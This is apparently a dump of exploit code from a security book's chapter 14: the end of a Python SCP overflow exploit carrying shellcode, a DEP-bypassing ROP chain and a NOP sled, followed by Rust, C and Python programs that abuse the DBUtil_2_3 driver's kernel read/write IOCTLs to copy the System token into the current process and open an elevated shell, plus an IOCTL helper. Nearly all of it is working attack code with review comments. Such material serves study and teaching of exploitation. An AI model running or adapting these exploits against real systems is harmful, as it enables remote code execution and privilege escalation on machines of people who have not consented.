sc += b"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
sc += b"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
sc += b"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69"
# ROP chain generated by Mona.py, along with fixes to deal with alignment.
# This is the DEP-aware counterpart of prosshd3.py. Instead of returning
# straight into the stack, the overwritten return address starts a chain of
# MSVCR71.dll gadgets that assembles the arguments for VirtualProtect() (the
# IAT pointer below), calls it through PUSHAD, and finally uses the same
# 'push esp # ret' gadget to land in the NOP sled. Every address is a fixed
# MSVCR71.dll location, so the chain depends on that module not being
# randomised as much as on the overflow itself.
rop = struct.pack('<L',0x7c349614) # RETN, skip 4 bytes [MSVCR71.dll]
rop += struct.pack('<L',0x7c34728e) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xfffffcdf) # Value to add to EBP,
rop += struct.pack('<L',0x7c1B451A) # ADD EBP,EAX # RETN
rop += struct.pack('<L',0x7c34728e) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xfffffdff) # Value to negate, will become 0x00000201
rop += struct.pack('<L',0x7c353c73) # NEG EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c34373a) # POP EBX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x7c345255) # INC EBX # FPATAN # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c352174) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c344efe) # POP EDX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L',0x7c351eb1) # NEG EDX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c36ba51) # POP ECX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c38f2f4) # &Writable location [MSVCR71.dll]
rop += struct.pack('<L',0x7c34a490) # POP EDI # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c346c0b) # RETN (ROP NOP) [MSVCR71.dll]
rop += struct.pack('<L',0x7c352dda) # POP ESI # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c3415a2) # JMP [EAX] [MSVCR71.dll]
rop += struct.pack('<L',0x7c34d060) # POP EAX # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c37a151) # ptr to &VirtualProtect() [IAT MSVCR71.dll]
rop += struct.pack('<L',0x7c378c81) # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
rop += struct.pack('<L',0x7c345c30) # ptr to 'push esp # ret ' [MSVCR71.dll]
# 492 filler bytes up to the saved return address (same offset prosshd3.py uses).
req = b"\x41" * 492
# NOP sled that the final gadget drops into; the payload follows it.
nop = b"\x90" * 200
ssh_client = paramiko.SSHClient()
# NOTE(review): no missing-host-key policy is set, so connect() raises unless
# the lab host's key is already in the system known_hosts.
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username, key_filename=None, password=password)
sleep(2)
# sanitize=lambda x: x disables the scp module's remote-path quoting so the
# bytes go out unchanged. Order on the wire: filler, ROP chain, sled, payload.
# The SCPClient object is passed as the "files" argument; the overflowing
# string is the remote path (library behaviour for that is not visible here).
with SCPClient(ssh_client.get_transport(), sanitize=lambda x:x) as scp:
    scp.put(scp, req+rop+nop+sc)
================================================
FILE: ch14/dbutil_exploit/Cargo.toml
================================================
[package]
name = "dbutil"
version = "0.1.0"
edition = "2018"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
winapi = {version = "0.3", features = ["fileapi", "ioapiset", "libloaderapi", "psapi", "winnt"]}
hex = "0.4"
================================================
FILE: ch14/dbutil_exploit/src/bin/exploit.rs
================================================
use dbutil::{get_kernel_base, open_dev, read_ptr, write_ptr};
use winapi::um::libloaderapi::{GetProcAddress, LoadLibraryA};
/// Offsets into the kernel's `_EPROCESS` structure. The Python variant of this
/// tool names them UniqueProcessId / ActiveProcessLinks / Token; the values are
/// specific to one Windows build and silently address the wrong fields on any
/// other.
const PID_OFFSET: usize = 0x440;
const APLINKS_OFFSET: usize = 0x448;
const TOKEN_OFFSET: usize = 0x4B8;

/// Token-swap flow over the driver's read/write primitives:
/// 1. locate `PsInitialSystemProcess` in the running kernel,
/// 2. read the System process's token through `read_ptr`,
/// 3. walk `ActiveProcessLinks` until the entry whose PID is ours,
/// 4. overwrite our token with System's and spawn `cmd.exe`.
///
/// Nothing here is undone afterwards: unlike `dbutil_exploit.py` the original
/// token is not saved or restored, and the System token value is written
/// exactly as read (the Python version clears its low 4 `_EX_FAST_REF` bits
/// first — whether that matters here is not shown by this file).
fn main() {
    // Handle from CreateFileA; `open_dev` does not check it for
    // INVALID_HANDLE_VALUE, so a missing driver surfaces as a panic in
    // `read_ptr` below.
    let hdev = unsafe { open_dev() };
    // Kernel address of PsInitialSystemProcess: take the symbol's RVA from a
    // user-mode mapping of ntoskrnl.exe and rebase it onto the real kernel
    // base found via EnumDeviceDrivers. Neither LoadLibraryA nor
    // GetProcAddress is checked for NULL.
    let lpisp = unsafe {
        let hkernel = LoadLibraryA("ntoskrnl.exe\0".as_ptr() as _);
        let local_isp = GetProcAddress(hkernel, "PsInitialSystemProcess\0".as_ptr() as _);
        local_isp as usize - hkernel as usize + get_kernel_base()
    };
    // Blocks until one byte arrives on stdin — presumably a pause so a
    // debugger can be attached before kernel memory is touched (TODO confirm).
    std::io::Read::read(&mut std::io::stdin(), &mut [0u8]).unwrap();
    let isp = read_ptr(hdev, lpisp);
    let systoken = read_ptr(hdev, isp + TOKEN_OFFSET);
    let mut curproc = isp;
    let mypid = std::process::id();
    let mut curpid = 0;
    // Follow the Flink of each ActiveProcessLinks entry back to the start of
    // the containing _EPROCESS. The loop has no bound: if the PID is never
    // seen (wrong offsets, list corruption) it never terminates.
    while curpid != mypid {
        curproc = read_ptr(hdev, curproc + APLINKS_OFFSET);
        curproc -= APLINKS_OFFSET;
        // `as _` narrows the 64-bit PID field to u32 to match process::id().
        curpid = read_ptr(hdev, curproc + PID_OFFSET) as _;
    }
    write_ptr(hdev, curproc + TOKEN_OFFSET, systoken);
    std::process::Command::new("cmd.exe").spawn().unwrap();
}
================================================
FILE: ch14/dbutil_exploit/src/bin/ioctlcall.rs
================================================
use dbutil::{ioctl, open_dev};
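/// Send one IOCTL to the DBUtil device from the command line.
///
/// Usage: `ioctlcall <ioctl-code-hex> <input-buffer-hex>` (the code may carry
/// a `0x` prefix). The buffer is used for both input and output — see
/// `dbutil::ioctl` — so whatever the driver wrote back is printed from the
/// same bytes.
///
/// A missing argument now produces a usage message and exit status 2 instead
/// of an index panic; a malformed code or hex buffer still panics via
/// `expect` with the original messages. The device is opened only after the
/// arguments are known to be present.
fn main() {
    let args: Vec<String> = std::env::args().collect();
    if args.len() < 3 {
        let prog = args.get(0).map(String::as_str).unwrap_or("ioctlcall");
        eprintln!("usage: {} <ioctl-code-hex> <input-buffer-hex>", prog);
        std::process::exit(2);
    }
    let code =
        u32::from_str_radix(args[1].trim_start_matches("0x"), 16).expect("Bad ioctl number");
    let mut buf = hex::decode(&args[2]).expect("Bad hex buf");
    let hdev = unsafe { open_dev() };
    // `ioctl` returns false when DeviceIoControl fails; the original discarded
    // that, which made a failed call look like an all-zero reply.
    let ok = unsafe { ioctl(hdev, code, buf.as_mut_ptr() as _, buf.len()) };
    if !ok {
        eprintln!("DeviceIoControl failed for ioctl {:#x}", code);
    }
    println!("Output: {}", hex::encode(&buf));
}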
================================================
FILE: ch14/dbutil_exploit/src/lib.rs
================================================
use std::mem::size_of;
use std::ptr::null_mut;
use winapi::um::{fileapi::*, ioapiset::*, psapi::*, winnt::*};
/// Request block for the driver's memmove IOCTLs (0x9B0C1EC4 read,
/// 0x9B0C1EC8 write). `#[repr(C)]` pins the layout the driver expects:
/// a 64-bit `key`, the kernel address `ptr`, a 32-bit `offset`, 32 bits of
/// `pad`, then one pointer-sized `data` word that receives the value read
/// (read IOCTL) or carries the value to store (write IOCTL). `key` and
/// `offset` are always left at their `Default` of 0 in this crate; what the
/// driver does with them is not shown here. The C and Python variants use a
/// variable-length byte array in place of `data`.
#[repr(C)]
#[derive(Default)]
struct DbMemmove {
    key: u64,
    ptr: usize,
    offset: u32,
    pad: u32,
    data: usize,
}
/// Open the `\\.\DBUtil_2_3` device for read/write with full sharing.
///
/// Returns the raw `HANDLE` from `CreateFileA` unchecked: on failure this is
/// `INVALID_HANDLE_VALUE`, and no caller in this crate tests for it, so a
/// missing driver only shows up when the first IOCTL fails.
pub unsafe fn open_dev() -> HANDLE {
    CreateFileA(
        "\\\\.\\DBUtil_2_3\0".as_ptr() as _,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        null_mut(),
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        null_mut(),
    )
}
/// Synchronous `DeviceIoControl` on `dev` with control code `num`, using the
/// same `buflen`-byte buffer for input and output. Returns `true` when the
/// call reports success (nonzero BOOL). Bytes-returned and OVERLAPPED are
/// passed as null; `buflen as _` narrows `usize` to the DWORD the API takes.
pub unsafe fn ioctl(dev: HANDLE, num: u32, iobuf: PVOID, buflen: usize) -> bool {
    DeviceIoControl(
        dev,
        num,
        iobuf,
        buflen as _,
        iobuf,
        buflen as _,
        null_mut(),
        null_mut(),
    ) != 0
}
/// Read one pointer-sized word of kernel memory at `ptr` through IOCTL
/// 0x9B0C1EC4 and return it from the request block's `data` field.
///
/// Panics if `DeviceIoControl` fails; there is no way for a caller to
/// recover, which is acceptable for a PoC but not for anything reusable.
pub fn read_ptr(hdev: HANDLE, ptr: usize) -> usize {
    // key/offset/pad/data start at zero; the driver fills `data`.
    let mut mc = DbMemmove {
        ptr,
        ..Default::default()
    };
    let mcptr = &mut mc as *mut DbMemmove;
    if unsafe { !ioctl(hdev, 0x9B0C1EC4, mcptr as _, size_of::<DbMemmove>()) } {
        panic!("Failed to read {:#x}", ptr as usize);
    }
    mc.data
}
/// Write one pointer-sized word `content` to kernel address `ptr` through
/// IOCTL 0x9B0C1EC8. Panics if `DeviceIoControl` fails. There is no
/// verification read-back; callers trust the driver's success status.
pub fn write_ptr(hdev: HANDLE, ptr: usize, content: usize) {
    let mut mc = DbMemmove {
        ptr,
        data: content,
        ..Default::default()
    };
    let mcptr = &mut mc as *mut DbMemmove;
    if unsafe { !ioctl(hdev, 0x9B0C1EC8, mcptr as _, size_of::<DbMemmove>()) } {
        panic!("Failed to write {:#x}", ptr as usize);
    }
}
/// Find the load address of `ntoskrnl.exe` by enumerating loaded drivers.
///
/// Uses the usual two-call `EnumDeviceDrivers` pattern (size query, then
/// fill), then asks `GetDeviceDriverBaseNameA` for each base name and
/// returns the first base whose name is exactly `ntoskrnl.exe`. The
/// comparison is case-sensitive (the C variant uses `stricmp`). Panics if
/// the name is not found or if a driver name is not valid UTF-8; the BOOL
/// results of both `EnumDeviceDrivers` calls are ignored.
pub unsafe fn get_kernel_base() -> usize {
    let mut needed: u32 = 0;
    // 260 bytes mirrors MAX_PATH; GetDeviceDriverBaseNameA is told the
    // buffer length so a longer name is truncated rather than overflowed.
    let mut namebuf = vec![0u8; 260];
    EnumDeviceDrivers(null_mut(), 0, &mut needed);
    let mut bases = vec![0usize; (needed as usize / size_of::<usize>()) as _];
    EnumDeviceDrivers(bases.as_mut_ptr() as _, needed, &mut needed);
    for base in bases.into_iter() {
        let len =
            GetDeviceDriverBaseNameA(base as _, namebuf.as_mut_ptr() as _, namebuf.len() as _);
        if "ntoskrnl.exe" == std::str::from_utf8(&namebuf[..len as _]).unwrap() {
            return base;
        }
    }
    panic!("Could not find kernel base");
}
================================================
FILE: ch14/dbutil_exploit.c
================================================
#include <windows.h>
#pragma comment(lib, "psapi.lib")
/* _EPROCESS field offsets (UniqueProcessId, ActiveProcessLinks, Token per
 * the dbutil_exploit.py notes). Valid for a single Windows build only; on
 * any other build they address the wrong fields without any error. */
const unsigned long PID_OFFSET = 0x440;
const unsigned long APLINKS_OFFSET = 0x448;
const unsigned long TOKEN_OFFSET = 0x4B8;
/*
 * Request header for the driver's memcpy IOCTLs (0x9B0C1EC4 read,
 * 0x9B0C1EC8 write). The data follows the header in the same buffer:
 * read() receives the kernel bytes in content[], write() supplies them
 * there. key, offset and pad are left zero by calloc() in this file; what
 * the driver makes of them is not shown here.
 * content[0] is a zero-length trailing array (compiler extension), so
 * sizeof(struct DbMemcpy) is the header size alone.
 */
struct DbMemcpy {
    DWORD64 key;
    ULONG_PTR ptr;      /* kernel address to copy from (read) or to (write) */
    DWORD offset;
    DWORD pad;
    BYTE content[0];    /* variable-length data, sized by the caller */
};
/*
 * Copy `size` bytes of kernel memory at `ptr` into `out` via IOCTL
 * 0x9B0C1EC4. Returns the DeviceIoControl result; `out` is written only
 * when the call reports success.
 *
 * NOTE(review): the calloc() result is not checked, so an allocation
 * failure dereferences NULL. The success test is `TRUE == ret`, while
 * DeviceIoControl is documented as returning "nonzero" — a value other
 * than 1 would be treated as failure and `out` left untouched. The
 * function name shadows the POSIX read(); nothing included here declares
 * that symbol, so it links, but renaming would be safer.
 */
BOOL read(HANDLE hdev, ULONG_PTR ptr, DWORD size, LPVOID out) {
    SIZE_T bufsz = sizeof(struct DbMemcpy) + size;
    struct DbMemcpy* db = (struct DbMemcpy*)calloc(1, bufsz);
    db->ptr = ptr; /* key, offset, pad stay zero from calloc */
    /* Same buffer as input and output; bufsz is narrowed to DWORD. */
    BOOL ret = DeviceIoControl(
        hdev,
        0x9B0C1EC4,
        db,
        bufsz,
        db,
        bufsz,
        NULL,
        NULL
    );
    if (TRUE == ret){
        memcpy(out, db->content, size);
    }
    free(db);
    return ret;
}
/*
 * Copy `size` bytes from `content` to kernel address `ptr` via IOCTL
 * 0x9B0C1EC8. Returns the DeviceIoControl result; no read-back verifies
 * the write.
 *
 * NOTE(review): as in read(), calloc() is unchecked and the name shadows
 * the POSIX write().
 */
BOOL write(HANDLE hdev, ULONG_PTR ptr, BYTE* content, DWORD size) {
    SIZE_T bufsz = sizeof(struct DbMemcpy) + size;
    struct DbMemcpy* db = (struct DbMemcpy*)calloc(1, bufsz);
    db->ptr = ptr;
    /* Payload bytes follow the header in the same allocation. */
    memcpy(db->content, content, size);
    BOOL ret = DeviceIoControl(
        hdev,
        0x9B0C1EC8,
        db,
        bufsz,
        db,
        bufsz,
        NULL,
        NULL
    );
    free(db);
    return ret;
}
/* Read one pointer-sized word at kernel address `src` into *out.
 * Returns read()'s BOOL; on failure *out is left unchanged. */
BOOL read_ptr(HANDLE hdev, ULONG_PTR src, ULONG_PTR* out) {
    return read(hdev, src, sizeof(LPVOID), (LPVOID)out);
}
/* Write one pointer-sized word `val` to kernel address `dst`.
 * The address of the local copy of `val` is what gets copied, so the
 * caller's variable is never modified. */
BOOL write_ptr(HANDLE hdev, ULONG_PTR dst, ULONG_PTR val) {
    return write(hdev, dst, (LPVOID)&val, sizeof(LPVOID));
}
/*
 * Return the load address of ntoskrnl.exe, or NULL if no loaded driver
 * has that base name. Two-call EnumDeviceDrivers pattern: size query,
 * then fill; each base is resolved to a name with GetDeviceDriverBaseNameA
 * and compared case-insensitively.
 *
 * NOTE(review): malloc() and both EnumDeviceDrivers() results are not
 * checked. stricmp() is the pre-ANSI spelling; MSVC's conforming name is
 * _stricmp(). The loop compares a signed int against a size_t quotient,
 * which compilers warn about but which is harmless for these sizes.
 * EnumDeviceDrivers/GetDeviceDriverBaseNameA come from psapi — presumably
 * the build's headers provide them; only windows.h is included here.
 */
LPVOID get_kernel_base() {
    DWORD lpcbNeeded = 0;
    LPVOID* bases = NULL;
    CHAR namebuf[MAX_PATH] = {0};
    LPVOID ret = NULL;
    EnumDeviceDrivers(NULL, 0, &lpcbNeeded);
    bases = malloc(lpcbNeeded);
    EnumDeviceDrivers(bases, lpcbNeeded, &lpcbNeeded);
    for (int i = 0; i < lpcbNeeded / sizeof(LPVOID); i++) {
        /* MAX_PATH is passed as the buffer size, so a long name is
         * truncated rather than overflowing namebuf. */
        GetDeviceDriverBaseNameA(bases[i], namebuf, MAX_PATH);
        if (!stricmp(namebuf, "ntoskrnl.exe")) {
            ret = bases[i];
            break;
        }
    }
    free(bases);
    return ret;
}
/*
 * Token-swap flow over the driver's read/write primitives: locate
 * PsInitialSystemProcess in the running kernel, read the System process's
 * token, walk ActiveProcessLinks to this process's _EPROCESS, overwrite
 * its token, then run cmd.exe.
 *
 * NOTE(review): every return value along the way is ignored — hdev may be
 * INVALID_HANDLE_VALUE, kernel_base/hkernel may be NULL, and a failed
 * read_ptr() leaves its output variable uninitialised (isp, systoken) or
 * stale (curproc), after which the loop walks garbage. The loop itself
 * has no bound, so a PID that is never found hangs the process. Nothing
 * is restored afterwards; dbutil_exploit.py saves and puts back the
 * original token and also clears the low 4 _EX_FAST_REF bits of the
 * System token before writing it, which this version does not do.
 */
int main(int argc, char** argv) {
    ULONG_PTR isp, systoken, curproc, lpisp;
    DWORD64 mypid = (DWORD64)GetCurrentProcessId(), curpid = 0;
    LPVOID kernel_base = get_kernel_base();
    HANDLE hdev = CreateFileA(
        "\\\\.\\DBUtil_2_3",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    /* RVA of the symbol in a user-mode mapping of the kernel image, rebased
     * onto the real kernel base found above. */
    HMODULE hkernel = LoadLibraryA("ntoskrnl.exe");
    lpisp = (ULONG_PTR)GetProcAddress(hkernel, "PsInitialSystemProcess") -
            (ULONG_PTR)hkernel + (ULONG_PTR)kernel_base;
    read_ptr(hdev, lpisp, &isp);
    read_ptr(hdev, isp+TOKEN_OFFSET, &systoken);
    curproc = isp;
    /* Follow each ActiveProcessLinks.Flink back to the containing _EPROCESS
     * until UniqueProcessId matches our PID. curpid is 64-bit and fully
     * overwritten by the 8-byte read. */
    while (curpid != mypid) {
        read_ptr(hdev, curproc+APLINKS_OFFSET, &curproc);
        curproc -= APLINKS_OFFSET;
        read_ptr(hdev, curproc+PID_OFFSET, (ULONG_PTR*)&curpid);
    }
    write_ptr(hdev, curproc+TOKEN_OFFSET, systoken);
    system("cmd.exe");
    return 0;
}
================================================
FILE: ch14/dbutil_exploit.py
================================================
from ctypes import (
    windll,
    LittleEndianStructure,
    POINTER,
    byref,
    cast,
    create_string_buffer,
    sizeof,
    c_uint64,
    c_ubyte,
    memmove,
)
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
from functools import partial
import os
# Alias for kernel32.GetLastError, used by the errcheck helpers below.
# NOTE(review): calling GetLastError through windll from Python is not
# guaranteed to see the failing call's error code, because ctypes may make
# other API calls in between; ctypes' own get_last_error()/WinError() with
# use_last_error=True is the documented way to capture it.
gle = windll.kernel32.GetLastError
# ctypes errcheck functions
def errcheck_bool(res, func, args):
    """ctypes errcheck for BOOL-returning APIs.

    A truthy result is passed through unchanged; a falsy one raises an
    Exception naming the function and the GetLastError() value.
    """
    if res:
        return res
    raise Exception("{} failed. GLE: {}".format(func.__name__, gle()))
def errcheck_drivername(res, func, args):
    """ctypes errcheck for GetDeviceDriverBaseNameA.

    The API returns the number of characters copied: 0 means failure, and a
    count equal to the buffer size passed as args[2] means the name was
    truncated. Both cases raise; any other count is returned unchanged.
    """
    message = None
    if res == 0:
        message = "{} failed. GLE: {}"
    elif res == args[2]:
        message = "{} failed. Buffer too short. GLE: {}"
    if message is not None:
        raise Exception(message.format(func.__name__, gle()))
    return res
def errcheck_createfile(res, func, args):
    """ctypes errcheck for CreateFileA.

    Raises when the handle equals INVALID_HANDLE_VALUE (HANDLE(-1)),
    quoting the device name from args[0]; otherwise returns the handle.
    """
    invalid_handle = HANDLE(-1).value  # INVALID_HANDLE_VALUE
    if res != invalid_handle:
        return res
    raise Exception("Failed to open device {}. GLE: {}".format(args[0], gle()))
# functions
GetProcAddress = windll.kernel32.GetProcAddress
LoadLibraryA = windll.kernel32.LoadLibraryA
CreateFileA = windll.kernel32.CreateFileA
DeviceIoControl = windll.kernel32.DeviceIoControl
GetDeviceDriverBaseNameA = windll.Psapi.GetDeviceDriverBaseNameA
EnumDeviceDrivers = windll.Psapi.EnumDeviceDrivers
# param/return types
# Restypes are declared explicitly because ctypes defaults every return to a
# C int, which truncates 64-bit handles and pointers.
GetProcAddress.restype = LPVOID
GetProcAddress.argtypes = [LPVOID, LPCSTR]
LoadLibraryA.restype = LPVOID
LoadLibraryA.argtypes = [LPCSTR]
CreateFileA.restype = HANDLE
# we won't use LPSECURITY_ATTRIBUTES (arg 4) so just use LPVOID
CreateFileA.argtypes = [LPCSTR, DWORD, DWORD, LPVOID, DWORD, DWORD, HANDLE]
CreateFileA.errcheck = errcheck_createfile
DeviceIoControl.restype = BOOL
# we won't use LPOVERLAPPED (arg 8) so just use LPVOID
DeviceIoControl.argtypes = [
    HANDLE,
    DWORD,
    LPVOID,
    DWORD,
    LPVOID,
    DWORD,
    POINTER(DWORD),
    LPVOID,
]
# With this errcheck every failed IOCTL raises, so _read/_write below never
# return partial data silently.
DeviceIoControl.errcheck = errcheck_bool
GetDeviceDriverBaseNameA.restype = DWORD
GetDeviceDriverBaseNameA.argtypes = [LPVOID, LPCSTR, DWORD]
GetDeviceDriverBaseNameA.errcheck = errcheck_drivername
EnumDeviceDrivers.restype = BOOL
EnumDeviceDrivers.argtypes = [LPVOID, DWORD, POINTER(DWORD)]
EnumDeviceDrivers.errcheck = errcheck_bool
# constants
# Win32 access/share/disposition flags, spelled out since ctypes has none.
GENERIC_READ = 1 << 30
GENERIC_WRITE = 1 << 31  # 0x80000000, still fits the DWORD argtype
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80
"""
dt _EPROCESS
nt!_EPROCESS
+0xXXX UniqueProcessId : Ptr64 Void
+0xYYY ActiveProcessLinks : _LIST_ENTRY
+0xZZZ Token : _EX_FAST_REF
"""
# _EPROCESS field offsets for the fields named in the dt _EPROCESS note
# above (UniqueProcessId, ActiveProcessLinks, Token). The note's XXX/YYY/ZZZ
# placeholders are deliberate: these numbers are valid for one Windows build
# only and must be re-read from the symbols for any other.
pid_off = 0x440
aplinks_off = 0x448
token_off = 0x4B8
# Value placed in DbMemcpy.key for every request; always 0 in this script.
key = 0
def GetProcAddressAbsolute(hmodule, realbase, symbol):
    """get the absolute address of a symbol in memory

    hmodule is a local mapping of the module (from LoadLibraryA), realbase
    the address the same module is actually loaded at elsewhere. The
    symbol's offset within the local mapping is rebased onto realbase.
    """
    rva = GetProcAddress(hmodule, symbol) - hmodule
    return realbase + rva
class DbMemcpy(LittleEndianStructure):
    """Memcpy arg structure that the driver expects for input

    Header of the request buffer for IOCTLs 0x9B0C1EC4 (read) and
    0x9B0C1EC8 (write); the data bytes follow it in the same buffer.
    key and offset are always 0 in this script; ptr is the kernel address.
    """
    _fields_ = [("key", c_uint64), ("ptr", LPVOID), ("offset", DWORD), ("pad", DWORD)]
def _read(hdev, ptr, size):
    """Read `size` bytes of kernel memory at `ptr` through IOCTL 0x9B0C1EC4.

    Returns the bytes that follow the DbMemcpy header in the reply buffer.
    A failed DeviceIoControl raises via its errcheck rather than returning
    short data.
    """
    mc = DbMemcpy(key, cast(ptr, LPVOID), 0, 0)
    buflen = sizeof(mc) + size
    # need a mutable buffer
    buf = (c_ubyte * buflen)()
    memmove(buf, bytes(mc), sizeof(mc))
    # Same buffer serves as input and output.
    DeviceIoControl(
        hdev, 0x9B0C1EC4, byref(buf), buflen, byref(buf), buflen, None, None
    )
    return bytes(buf)[sizeof(mc) :]
def _write(hdev, ptr, contents):
    """Write `contents` (bytes) to kernel address `ptr` through IOCTL 0x9B0C1EC8.

    The header and payload are concatenated into one immutable bytes object
    and passed as both input and output buffer; nothing is read back, so
    the same object doubling as the output buffer is harmless only as long
    as the driver does not write into it.
    """
    mc = DbMemcpy(key, cast(ptr, LPVOID), 0, 0)
    buf = bytes(mc) + contents
    DeviceIoControl(hdev, 0x9B0C1EC8, buf, len(buf), buf, len(buf), None, None)
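def get_driver_bases():
    """Return a dictionary of loaded kernel modules and their base addresses

    Keys are driver base names as bytes (e.g. b"ntoskrnl.exe"), values are
    the LPVOID base addresses reported by EnumDeviceDrivers. Null entries
    in the enumeration are skipped. Failures in either API raise through
    their errcheck hooks.
    """
    lpcbNeeded = DWORD()
    # First call with a NULL array only reports the byte count required.
    EnumDeviceDrivers(None, 0, byref(lpcbNeeded))
    count = lpcbNeeded.value // sizeof(LPVOID)
    bases = (LPVOID * count)()
    EnumDeviceDrivers(byref(bases), lpcbNeeded, byref(lpcbNeeded))
    # A real writable ctypes buffer. The previous LPSTR(b"\x00" * 260)
    # handed the API a pointer into an immutable bytes object, which the
    # call then overwrote in place.
    drvbuf = create_string_buffer(260)  # max path should be enough
    ret = dict()
    for base in bases:
        if not base:
            continue
        GetDeviceDriverBaseNameA(base, drvbuf, 260)
        # .value stops at the NUL terminator the API writes.
        ret[drvbuf.value] = base
    return ret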
# 1. Enumerate drivers, get kernel name and base address
drivers = get_driver_bases()
krnlname = b"ntoskrnl.exe"
# KeyError here means the kernel image is not listed under that name.
krnlbase = drivers[krnlname]
# 2. Open the device that the dbutil driver creates (the CreateFileA
#    errcheck raises if it is not present)
hdb = CreateFileA(
    b"\\\\.\\DBUtil_2_3",
    GENERIC_READ | GENERIC_WRITE,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    None,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    None,
)
# Bind the device handle once; read/write take (addr, ...) from here on.
read = partial(_read, hdb)
write = partial(_write, hdb)
# 8-byte little-endian words, i.e. 64-bit kernel pointers.
read_ptr = lambda addr: int.from_bytes(read(addr, 8), "little")
write_ptr = lambda addr, val: write(addr, val.to_bytes(8, "little"))
# 3. Find system’s EPROCESS structure, get the system token
# LoadLibraryA maps ntoskrnl.exe in user mode only to resolve the symbol's
# RVA; the real address comes from rebasing onto krnlbase.
hkernel = LoadLibraryA(krnlname)
lpisp = GetProcAddressAbsolute(hkernel, krnlbase, b"PsInitialSystemProcess")
isp = read_ptr(lpisp)
systoken = read_ptr(isp + token_off)
# Token is an _EX_FAST_REF (see the dt note above): the low 4 bits hold a
# reference count, not address bits, so they are cleared before reuse.
systoken &= ~0b1111
print("System token: " + hex(systoken))
# 4. Find the current process’s EPROCESS structure
mypid = os.getpid()
curpid = 0
curproc = isp
# Follow ActiveProcessLinks.Flink back to the containing _EPROCESS until
# UniqueProcessId matches. Unbounded: wrong offsets make this loop forever.
while curpid != mypid:
    curproc = read_ptr(curproc + aplinks_off)
    curproc -= aplinks_off
    curpid = read_ptr(curproc + pid_off)
print("Got curproc eprocess address = 0x{:08x}".format(curproc))
# 5. Back up the current token, copy the system token to the current process’s
# token field
oldtoken = read_ptr(curproc + token_off)
write_ptr(curproc + token_off, systoken)
# 6. Execute a program, restore the current process’s saved token
# Restoring matters: the borrowed token's reference count was never
# incremented, so leaving it in place would be unstable at process exit.
os.system("powershell.exe")
print("Done. Repairing.")
write_ptr(curproc + token_off, oldtoken)
================================================
FILE: ch14/ioctlcall.py
================================================
from ctypes import windll, POINTER, byref, create_string_buffer
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
# Alias for kernel32.GetLastError used by the errcheck helpers below.
# NOTE(review): reading GetLastError through windll from Python may not see
# the failing call's code, since ctypes can make other API calls in between;
# ctypes.get_last_error() with use_last_error=True is the documented route.
gle = windll.kernel32.GetLastError
# ctypes errcheck functions
def errcheck_bool(res, func, args):
    """ctypes errcheck for BOOL-returning APIs (non-fatal variant).

    A falsy result is reported on stdout with the GetLastError() value but
    still returned, so the caller decides what to do; a truthy result is
    returned untouched.
    """
    succeeded = bool(res)
    if succeeded:
        return res
    print("{} failed. GLE: {}".format(func.__name__, gle()))
    return res
def errcheck_createfile(res, func, args):
    """ctypes errcheck for CreateFileA.

    Raises when the handle equals INVALID_HANDLE_VALUE (HANDLE(-1)),
    quoting the device name from args[0]; otherwise returns the handle.
    """
    invalid_handle = HANDLE(-1).value  # INVALID_HANDLE_VALUE
    if res != invalid_handle:
        return res
    raise Exception("Failed to open device {}. GLE: {}"
                    .format(args[0], gle()))
DeviceIoControl = windll.kernel32.DeviceIoControl
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
# Restypes are declared explicitly: ctypes defaults to a C int return,
# which would truncate a 64-bit HANDLE.
DeviceIoControl.restype = BOOL
# we won't use LPOVERLAPPED (arg 8) so just use LPVOID
DeviceIoControl.argtypes = [HANDLE, DWORD, LPVOID, DWORD, LPVOID, DWORD,
                            POINTER(DWORD), LPVOID]
# errcheck_bool only prints on failure, so ioctl() below keeps running
# after a failed call; callers should look at the bytes-returned count.
DeviceIoControl.errcheck = errcheck_bool
CreateFileA.restype = HANDLE
# we won't use LPSECURITY_ATTRIBUTES (arg 4) so just use LPVOID
CreateFileA.argtypes = [LPCSTR, DWORD, DWORD, LPVOID, DWORD, DWORD, HANDLE]
CreateFileA.errcheck = errcheck_createfile
CloseHandle.restype = BOOL
CloseHandle.argtypes = [HANDLE]
# constants
# Win32 access/share/disposition flags, spelled out since ctypes has none.
GENERIC_READ = (1 << 30)
GENERIC_WRITE = (1 << 31)  # 0x80000000, fits the DWORD argtype
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80
